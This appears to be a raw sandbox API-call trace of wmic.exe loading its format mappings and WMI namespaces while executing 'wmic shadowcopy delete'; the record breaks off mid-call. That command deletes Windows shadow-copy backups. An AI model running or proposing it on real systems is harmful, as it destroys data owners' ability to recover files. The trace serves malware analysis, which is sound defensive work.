lpBuffer=0x2f8fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0116.988] free (_Block=0x2f8fd0) [0116.988] malloc (_Size=0x18) returned 0x2f6d40 [0116.988] malloc (_Size=0x18) returned 0x2f6d60 [0116.988] malloc (_Size=0x18) returned 0x2f6d80 [0116.988] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0116.988] SysStringLen (param_1="\\wbem\\") returned 0x6 [0116.988] free (_Block=0x2f6d40) [0116.988] free (_Block=0x2f6d60) [0116.988] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0116.988] free (_Block=0x2f6d80) [0116.988] malloc (_Size=0x18) returned 0x2f6d40 [0116.988] malloc (_Size=0x18) returned 0x2f6d60 [0116.988] malloc (_Size=0x18) returned 0x2f6d80 [0116.988] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0116.988] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0116.988] free (_Block=0x2f6d40) [0116.988] free (_Block=0x2f6d60) [0116.988] GetCurrentThreadId () returned 0x6d8 [0116.988] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x16f380 | out: phkResult=0x16f380*=0x104) returned 0x0 [0116.989] RegQueryValueExW (in: hKey=0x104, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x16f3d0, lpcbData=0x16f370*=0x400 | out: lpType=0x0, lpData=0x16f3d0*=0x30, lpcbData=0x16f370*=0x4) returned 0x0 [0116.989] _wcsicmp (_String1="0", _String2="1") returned -1 [0116.989] _wcsicmp (_String1="0", _String2="2") returned -2 [0116.989] RegQueryValueExW (in: hKey=0x104, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x16f370*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x16f370*=0x42) returned 0x0 [0116.989] malloc (_Size=0x86) returned 0x2f6da0 [0116.989] RegQueryValueExW (in: hKey=0x104, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x2f6da0, lpcbData=0x16f370*=0x42 | out: lpType=0x0, lpData=0x2f6da0*=0x25, lpcbData=0x16f370*=0x42) returned 0x0 [0116.989] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0116.989] malloc (_Size=0x42) returned 0x2f6e30 [0116.989] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0116.989] RegQueryValueExW (in: hKey=0x104, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x16f3d0, lpcbData=0x16f370*=0x400 | out: lpType=0x0, lpData=0x16f3d0*=0x36, lpcbData=0x16f370*=0xc) returned 0x0 [0116.989] _wtol (_String="65536") returned 65536 [0116.989] free (_Block=0x2f6da0) [0116.989] RegCloseKey (hKey=0x0) returned 0x6 [0116.989] CoCreateInstance (in: rclsid=0xff3b7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff3b73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x16f878 | out: ppv=0x16f878*=0x20d71d0) returned 0x0 [0117.330] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x20d71d0, xmlSource=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x2f6d40), isSuccessful=0x16fa30 | out: isSuccessful=0x16fa30*=0xffff) returned 0x0 [0125.453] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x20d71d0, DOMElement=0x16f870 | out: DOMElement=0x16f870) returned 0x0 [0125.453] malloc (_Size=0x18) returned 0x2f6d40 [0125.456] free (_Block=0x2f6d40) [0125.458] malloc (_Size=0x18) returned 0x2f6d40 [0125.459] free (_Block=0x2f6d40) [0125.459] malloc (_Size=0x18) returned 0x2f6d40 [0125.459] malloc (_Size=0x18) returned 0x2f6d60 [0125.459] malloc (_Size=0x30) returned 0x2f8080 [0125.459] malloc (_Size=0x18) returned 0x2f6e80 [0125.459] free (_Block=0x2f6e80) [0125.459] malloc (_Size=0x18) returned 0x2fc270 [0125.459] malloc (_Size=0x18) returned 0x2fc290 [0125.459] SysStringLen (param_1="VALUE") returned 0x5 [0125.460] SysStringLen (param_1="TABLE") returned 0x5 [0125.460] SysStringLen (param_1="TABLE") returned 0x5 [0125.460] SysStringLen (param_1="VALUE") returned 0x5 [0125.460] malloc (_Size=0x30) returned 0x2f80c0 [0125.460] malloc (_Size=0x18) returned 0x2fc2b0 [0125.460] free (_Block=0x2fc2b0) [0125.460] malloc (_Size=0x18) returned 0x2fc2b0 [0125.460] malloc (_Size=0x18) returned 0x2fc2d0 [0125.460] SysStringLen (param_1="LIST") returned 0x4 [0125.460] SysStringLen (param_1="TABLE") returned 0x5 [0125.460] malloc (_Size=0x30) returned 0x2f8100 [0125.460] malloc (_Size=0x18) returned 0x2fc2f0 [0125.461] free (_Block=0x2fc2f0) [0125.461] malloc (_Size=0x18) returned 0x2fc2f0 [0125.461] malloc (_Size=0x18) returned 0x2fc310 [0125.461] SysStringLen (param_1="RAWXML") returned 0x6 [0125.461] SysStringLen (param_1="TABLE") returned 0x5 [0125.461] SysStringLen (param_1="RAWXML") returned 0x6 [0125.461] SysStringLen (param_1="LIST") returned 0x4 [0125.461] SysStringLen (param_1="LIST") returned 0x4 [0125.461] SysStringLen (param_1="RAWXML") returned 0x6 [0125.461] malloc (_Size=0x30) returned 0x2f8140 [0125.461] malloc (_Size=0x18) returned 0x2fc330 [0125.461] free (_Block=0x2fc330) [0125.461] malloc (_Size=0x18) returned 0x2fc330 [0125.461] malloc (_Size=0x18) returned 0x2fc350 [0125.462] SysStringLen (param_1="HTABLE") returned 0x6 [0125.462] SysStringLen (param_1="TABLE") returned 0x5 [0125.462] SysStringLen (param_1="HTABLE") returned 0x6 [0125.462] SysStringLen (param_1="LIST") returned 0x4 [0125.462] malloc (_Size=0x30) returned 0x2f8180 [0125.462] malloc (_Size=0x18) returned 0x2fc370 [0125.462] free (_Block=0x2fc370) [0125.462] malloc (_Size=0x18) returned 0x2fc370 [0125.462] malloc (_Size=0x18) returned 0x2fc390 [0125.462] SysStringLen (param_1="HFORM") returned 0x5 [0125.462] SysStringLen (param_1="TABLE") returned 0x5 [0125.462] SysStringLen (param_1="HFORM") returned 0x5 [0125.462] SysStringLen (param_1="LIST") returned 0x4 [0125.462] SysStringLen (param_1="HFORM") returned 0x5 [0125.462] SysStringLen (param_1="HTABLE") returned 0x6 [0125.462] malloc (_Size=0x30) returned 0x2f81c0 [0125.463] malloc (_Size=0x18) returned 0x2fc3b0 [0125.463] free (_Block=0x2fc3b0) [0125.463] malloc (_Size=0x18) returned 0x2fc3b0 [0125.463] malloc (_Size=0x18) returned 0x2fc3d0 [0125.463] SysStringLen (param_1="XML") returned 0x3 [0125.463] SysStringLen (param_1="TABLE") returned 0x5 [0125.463] SysStringLen (param_1="XML") returned 0x3 [0125.463] SysStringLen (param_1="VALUE") returned 0x5 [0125.463] SysStringLen (param_1="VALUE") returned 0x5 [0125.463] SysStringLen (param_1="XML") returned 0x3 [0125.463] malloc (_Size=0x30) returned 0x2f8200 [0125.463] malloc (_Size=0x18) returned 0x2fc3f0 [0125.463] free (_Block=0x2fc3f0) [0125.463] malloc (_Size=0x18) returned 0x2fc3f0 [0125.463] malloc (_Size=0x18) returned 0x2fc410 [0125.463] SysStringLen (param_1="MOF") returned 0x3 [0125.463] SysStringLen (param_1="TABLE") returned 0x5 [0125.464] SysStringLen (param_1="MOF") returned 0x3 [0125.464] SysStringLen (param_1="LIST") returned 0x4 [0125.464] SysStringLen (param_1="MOF") returned 0x3 [0125.464] SysStringLen (param_1="RAWXML") returned 0x6 [0125.464] SysStringLen (param_1="LIST") returned 0x4 [0125.464] SysStringLen (param_1="MOF") returned 0x3 [0125.464] malloc (_Size=0x30) returned 0x2f8240 [0125.464] malloc (_Size=0x18) returned 0x2fc430 [0125.464] free (_Block=0x2fc430) [0125.464] malloc (_Size=0x18) returned 0x2fc430 [0125.464] malloc (_Size=0x18) returned 0x2fc450 [0125.464] SysStringLen (param_1="CSV") returned 0x3 [0125.464] SysStringLen (param_1="TABLE") returned 0x5 [0125.464] SysStringLen (param_1="CSV") returned 0x3 [0125.464] SysStringLen (param_1="LIST") returned 0x4 [0125.464] SysStringLen (param_1="CSV") returned 0x3 [0125.464] SysStringLen (param_1="HTABLE") returned 0x6 [0125.464] SysStringLen (param_1="CSV") returned 0x3 [0125.464] SysStringLen (param_1="HFORM") returned 0x5 [0125.464] malloc (_Size=0x30) returned 0x2f8280 [0125.465] malloc (_Size=0x18) returned 0x2fc470 [0125.465] free (_Block=0x2fc470) [0125.465] malloc (_Size=0x18) returned 0x2fc470 [0125.465] malloc (_Size=0x18) returned 0x2fc490 [0125.465] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.465] SysStringLen (param_1="TABLE") returned 0x5 [0125.465] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.465] SysStringLen (param_1="VALUE") returned 0x5 [0125.465] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.465] SysStringLen (param_1="XML") returned 0x3 [0125.465] SysStringLen (param_1="XML") returned 0x3 [0125.465] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.465] malloc (_Size=0x30) returned 0x2f82c0 [0125.465] malloc (_Size=0x18) returned 0x2fc4b0 [0125.466] free (_Block=0x2fc4b0) [0125.466] malloc (_Size=0x18) returned 0x2fc4b0 [0125.466] malloc (_Size=0x18) returned 0x2fc4d0 [0125.466] SysStringLen (param_1="texttablewsys") returned 0xd [0125.466] SysStringLen (param_1="TABLE") returned 0x5 [0125.466] SysStringLen (param_1="texttablewsys") returned 0xd [0125.466] SysStringLen (param_1="XML") returned 0x3 [0125.466] SysStringLen (param_1="texttablewsys") returned 0xd [0125.466] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.466] SysStringLen (param_1="XML") returned 0x3 [0125.466] SysStringLen (param_1="texttablewsys") returned 0xd [0125.466] malloc (_Size=0x30) returned 0x2f8300 [0125.466] malloc (_Size=0x18) returned 0x2fc4f0 [0125.466] free (_Block=0x2fc4f0) [0125.466] malloc (_Size=0x18) returned 0x2fc4f0 [0125.466] malloc (_Size=0x18) returned 0x2fc510 [0125.466] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.466] SysStringLen (param_1="TABLE") returned 0x5 [0125.467] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.467] SysStringLen (param_1="XML") returned 0x3 [0125.467] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.467] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.467] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.467] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.467] malloc (_Size=0x30) returned 0x2f8340 [0125.467] malloc (_Size=0x18) returned 0x2fc530 [0125.467] free (_Block=0x2fc530) [0125.467] malloc (_Size=0x18) returned 0x2fc530 [0125.467] malloc (_Size=0x18) returned 0x2fc550 [0125.467] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.467] SysStringLen (param_1="TABLE") returned 0x5 [0125.467] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.467] SysStringLen (param_1="XML") returned 0x3 [0125.467] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.467] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.467] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.467] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.467] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.467] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.467] malloc (_Size=0x30) returned 0x2f8380 [0125.468] malloc (_Size=0x18) returned 0x2fc570 [0125.468] free (_Block=0x2fc570) [0125.468] malloc (_Size=0x18) returned 0x2fc570 [0125.468] malloc (_Size=0x18) returned 0x2fc590 [0125.468] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.468] SysStringLen (param_1="TABLE") returned 0x5 [0125.468] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.468] SysStringLen (param_1="XML") returned 0x3 [0125.468] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.468] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.468] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.468] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.468] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.468] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.468] malloc (_Size=0x30) returned 0x2f83c0 [0125.468] malloc (_Size=0x18) returned 0x2fc5b0 [0125.468] free (_Block=0x2fc5b0) [0125.469] malloc (_Size=0x18) returned 0x2fc5b0 [0125.469] malloc (_Size=0x18) returned 0x2fc5d0 [0125.469] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0125.469] SysStringLen (param_1="TABLE") returned 0x5 [0125.469] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0125.469] SysStringLen (param_1="XML") returned 0x3 [0125.469] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0125.469] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.469] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0125.469] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.469] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0125.469] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.469] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.469] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0125.469] malloc (_Size=0x30) returned 0x2f8400 [0125.469] malloc (_Size=0x18) returned 0x2fc5f0 [0125.469] free (_Block=0x2fc5f0) [0125.469] malloc (_Size=0x18) returned 0x2fc5f0 [0125.469] malloc (_Size=0x18) returned 0x2fc610 [0125.469] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0125.469] SysStringLen (param_1="TABLE") returned 0x5 [0125.469] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0125.470] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.470] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0125.470] SysStringLen (param_1="XML") returned 0x3 [0125.470] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0125.470] SysStringLen (param_1="texttablewsys") returned 0xd [0125.470] SysStringLen (param_1="XML") returned 0x3 [0125.470] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0125.470] malloc (_Size=0x30) returned 0x2f8440 [0125.470] malloc (_Size=0x18) returned 0x2fc630 [0125.470] free (_Block=0x2fc630) [0125.470] malloc (_Size=0x18) returned 0x2fc630 [0125.470] malloc (_Size=0x18) returned 0x2fc650 [0125.470] SysStringLen (param_1="htable-sortby") returned 0xd [0125.470] SysStringLen (param_1="TABLE") returned 0x5 [0125.470] SysStringLen (param_1="htable-sortby") returned 0xd [0125.470] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.470] SysStringLen (param_1="htable-sortby") returned 0xd [0125.470] SysStringLen (param_1="XML") returned 0x3 [0125.470] SysStringLen (param_1="htable-sortby") returned 0xd [0125.470] SysStringLen (param_1="texttablewsys") returned 0xd [0125.470] SysStringLen (param_1="htable-sortby") returned 0xd [0125.470] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0125.470] SysStringLen (param_1="XML") returned 0x3 [0125.470] SysStringLen (param_1="htable-sortby") returned 0xd [0125.471] malloc (_Size=0x30) returned 0x2f8480 [0125.471] malloc (_Size=0x18) returned 0x2fc670 [0125.471] free (_Block=0x2fc670) [0125.471] malloc (_Size=0x18) returned 0x2fc670 [0125.471] malloc (_Size=0x18) returned 0x2fc690 [0125.471] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0125.471] SysStringLen (param_1="TABLE") returned 0x5 [0125.471] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0125.471] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.471] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0125.471] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.471] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0125.471] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.471] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.471] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0125.471] malloc (_Size=0x30) returned 0x2f84c0 [0125.472] malloc (_Size=0x18) returned 0x2fc6b0 [0125.472] free (_Block=0x2fc6b0) [0125.472] malloc (_Size=0x18) returned 0x2fc6b0 [0125.472] malloc (_Size=0x18) returned 0x2fc6d0 [0125.472] SysStringLen (param_1="wmiclimofformat") returned 0xf [0125.472] SysStringLen (param_1="TABLE") returned 0x5 [0125.472] SysStringLen (param_1="wmiclimofformat") returned 0xf [0125.472] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.472] SysStringLen (param_1="wmiclimofformat") returned 0xf [0125.472] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.472] SysStringLen (param_1="wmiclimofformat") returned 0xf [0125.472] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.472] SysStringLen (param_1="wmiclimofformat") returned 0xf [0125.472] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0125.472] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.472] SysStringLen (param_1="wmiclimofformat") returned 0xf [0125.472] malloc (_Size=0x30) returned 0x2f8500 [0125.472] malloc (_Size=0x18) returned 0x2fc6f0 [0125.472] free (_Block=0x2fc6f0) [0125.473] malloc (_Size=0x18) returned 0x2fc6f0 [0125.473] malloc (_Size=0x18) returned 0x2fc710 [0125.473] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0125.473] SysStringLen (param_1="TABLE") returned 0x5 [0125.473] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0125.473] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.473] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0125.473] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.473] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0125.473] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.473] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.473] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0125.473] malloc (_Size=0x30) returned 0x2f8540 [0125.473] malloc (_Size=0x18) returned 0x2fc730 [0125.473] free (_Block=0x2fc730) [0125.473] malloc (_Size=0x18) returned 0x2fc730 [0125.473] malloc (_Size=0x18) returned 0x2fc750 [0125.473] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0125.473] SysStringLen (param_1="TABLE") returned 0x5 [0125.474] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0125.474] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.474] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0125.474] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.474] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0125.474] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.474] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0125.474] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0125.474] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.474] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0125.474] malloc (_Size=0x30) returned 0x2f8580 [0125.474] FreeThreadedDOMDocument:IUnknown:Release (This=0x20d71d0) returned 0x0 [0125.474] free (_Block=0x2f6d80) [0125.474] GetCommandLineW () returned="wmic shadowcopy delete" [0125.483] malloc (_Size=0x30) returned 0x2f85c0 [0125.483] memcpy_s (in: _Destination=0x2f85c0, _DestinationSize=0x2e, _Source=0x3225ec, _SourceSize=0x2e | out: _Destination=0x2f85c0) returned 0x0 [0125.483] malloc (_Size=0x18) returned 0x2fc770 [0125.484] malloc (_Size=0x18) returned 0x2fc790 [0125.484] malloc (_Size=0x18) returned 0x2fc7b0 [0125.484] malloc (_Size=0x18) returned 0x2fc7d0 [0125.484] malloc (_Size=0x80) returned 0x2f6d80 [0125.484] GetLocalTime (in: lpSystemTime=0x16fa10 | out: lpSystemTime=0x16fa10*(wYear=0x7e4, wMonth=0x6, wDayOfWeek=0x3, wDay=0xa, wHour=0x0, wMinute=0x30, wSecond=0x2a, wMilliseconds=0x88)) [0125.484] _vsnwprintf (in: _Buffer=0x2f6d80, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x16f968 | out: _Buffer="06-10-2020T00:48:42") returned 19 [0125.484] lstrlenW (lpString=" shadowcopy delete") returned 19 [0125.484] malloc (_Size=0x28) returned 0x2f6e80 [0125.484] lstrlenW (lpString=" shadowcopy delete") returned 19 [0125.484] lstrlenW (lpString=" shadowcopy delete") returned 19 [0125.484] malloc (_Size=0x28) returned 0x2f6eb0 [0125.484] lstrlenW (lpString=" shadowcopy delete") returned 19 [0125.484] lstrlenW (lpString=" shadowcopy delete") returned 19 [0125.484] lstrlenW (lpString=" shadowcopy delete") returned 19 [0125.484] malloc (_Size=0x16) returned 0x2fc7f0 [0125.484] lstrlenW (lpString="shadowcopy") returned 10 [0125.484] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0125.484] malloc (_Size=0x16) returned 0x2fc810 [0125.484] malloc (_Size=0x8) returned 0x2f6e10 [0125.484] free (_Block=0x0) [0125.484] free (_Block=0x2fc7f0) [0125.485] lstrlenW (lpString=" shadowcopy delete") returned 19 [0125.485] malloc (_Size=0xe) returned 0x2fc7f0 [0125.485] lstrlenW (lpString="delete") returned 6 [0125.485] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0125.485] malloc (_Size=0xe) returned 0x2fc830 [0125.485] malloc (_Size=0x10) returned 0x2fc850 [0125.485] memmove_s (in: _Destination=0x2fc850, _DestinationSize=0x8, _Source=0x2f6e10, _SourceSize=0x8 | out: _Destination=0x2fc850) returned 0x0 [0125.485] free (_Block=0x2f6e10) [0125.485] free (_Block=0x0) [0125.485] free (_Block=0x2fc7f0) [0125.485] malloc (_Size=0x10) returned 0x2fc7f0 [0125.485] lstrlenW (lpString="QUIT") returned 4 [0125.485] lstrlenW (lpString="shadowcopy") returned 10 [0125.485] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0125.485] lstrlenW (lpString="EXIT") returned 4 [0125.485] lstrlenW (lpString="shadowcopy") returned 10 [0125.485] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0125.485] free (_Block=0x2fc7f0) [0125.485] WbemLocator:IUnknown:AddRef (This=0x1b91390) returned 0x2 [0125.485] malloc (_Size=0x10) returned 0x2fc7f0 [0125.485] lstrlenW (lpString="/") returned 1 [0125.485] lstrlenW (lpString="shadowcopy") returned 10 [0125.485] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0125.485] lstrlenW (lpString="-") returned 1 [0125.485] lstrlenW (lpString="shadowcopy") returned 10 [0125.486] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0125.486] lstrlenW (lpString="CLASS") returned 5 [0125.486] lstrlenW (lpString="shadowcopy") returned 10 [0125.486] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0125.486] lstrlenW (lpString="PATH") returned 4 [0125.486] lstrlenW (lpString="shadowcopy") returned 10 [0125.486] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0125.486] lstrlenW (lpString="CONTEXT") returned 7 [0125.486] lstrlenW (lpString="shadowcopy") returned 10 [0125.486] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0125.486] lstrlenW (lpString="shadowcopy") returned 10 [0125.486] malloc (_Size=0x16) returned 0x2fc870 [0125.486] lstrlenW (lpString="shadowcopy") returned 10 [0125.490] GetCurrentThreadId () returned 0x6d8 [0125.490] ??0CHString@@QEAA@XZ () returned 0x16f820 [0125.490] malloc (_Size=0x18) returned 0x2fc890 [0125.491] malloc (_Size=0x18) returned 0x2fc8b0 [0125.491] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1b91390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff422998 | out: ppNamespace=0xff422998*=0x1ba3a98) returned 0x0 [0126.471] free (_Block=0x2fc8b0) [0126.471] free (_Block=0x2fc890) [0126.471] CoSetProxyBlanket (pProxy=0x1ba3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0126.471] ??1CHString@@QEAA@XZ () returned 0x7fef927482c [0126.471] GetCurrentThreadId () returned 0x6d8 [0126.471] ??0CHString@@QEAA@XZ () returned 0x16f6b8 [0126.471] malloc (_Size=0x18) returned 0x2fc890 [0126.472] malloc (_Size=0x18) returned 0x2fc8b0 [0126.472] malloc (_Size=0x18) returned 0x2fc8d0 [0126.472] malloc (_Size=0x18) returned 0x2fc8f0 [0126.472] SysStringLen (param_1="root\\cli") returned 0x8 [0126.472] SysStringLen (param_1="\\") returned 0x1 [0126.472] malloc (_Size=0x18) returned 0x2fc910 [0126.472] SysStringLen (param_1="root\\cli\\") returned 0x9 [0126.472] SysStringLen (param_1="ms_409") returned 0x6 [0126.472] free (_Block=0x2fc8f0) [0126.472] free (_Block=0x2fc8d0) [0126.472] free (_Block=0x2fc8b0) [0126.472] free (_Block=0x2fc890) [0126.472] malloc (_Size=0x18) returned 0x2fc890 [0126.472] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1b91390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4229a0 | out: ppNamespace=0xff4229a0*=0x1ba3b28) returned 0x0 [0126.488] free (_Block=0x2fc890) [0126.488] free (_Block=0x2fc910) [0126.488] ??1CHString@@QEAA@XZ () returned 0x7fef927482c [0126.488] GetCurrentThreadId () returned 0x6d8 [0126.488] ??0CHString@@QEAA@XZ () returned 0x16f830 [0126.488] malloc (_Size=0x18) returned 0x2fc910 [0126.488] malloc (_Size=0x18) returned 0x2fc890 [0126.488] malloc (_Size=0x18) returned 0x2fc8b0 [0126.488] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0126.488] malloc (_Size=0x3a) returned 0x2fca40 [0126.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3b1980, cbMultiByte=-1, lpWideCharStr=0x2fca40, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0126.489] free (_Block=0x2fca40) [0126.489] malloc (_Size=0x18) returned 0x2fc8d0 [0126.489] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0126.489] SysStringLen (param_1="shadowcopy") returned 0xa [0126.489] malloc (_Size=0x18) returned 0x2fc8f0 [0126.489] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0126.489] SysStringLen (param_1="'") returned 0x1 [0126.489] free (_Block=0x2fc8d0) [0126.489] free (_Block=0x2fc8b0) [0126.489] free (_Block=0x2fc890) [0126.489] free (_Block=0x2fc910) [0126.489] IWbemServices:GetObject (in: This=0x1ba3a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x16f838*=0x0, ppCallResult=0x0 | out: ppObject=0x16f838*=0x1bb04e0, ppCallResult=0x0) returned 0x0 [0126.505] malloc (_Size=0x18) returned 0x2fc910 [0126.505] IWbemClassObject:Get (in: This=0x1bb04e0, wszName="Target", lFlags=0, pVal=0x16f760*(varType=0x0, wReserved1=0xff42, wReserved2=0x0, wReserved3=0x0, varVal1=0xff422998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f760*(varType=0x8, wReserved1=0xff42, 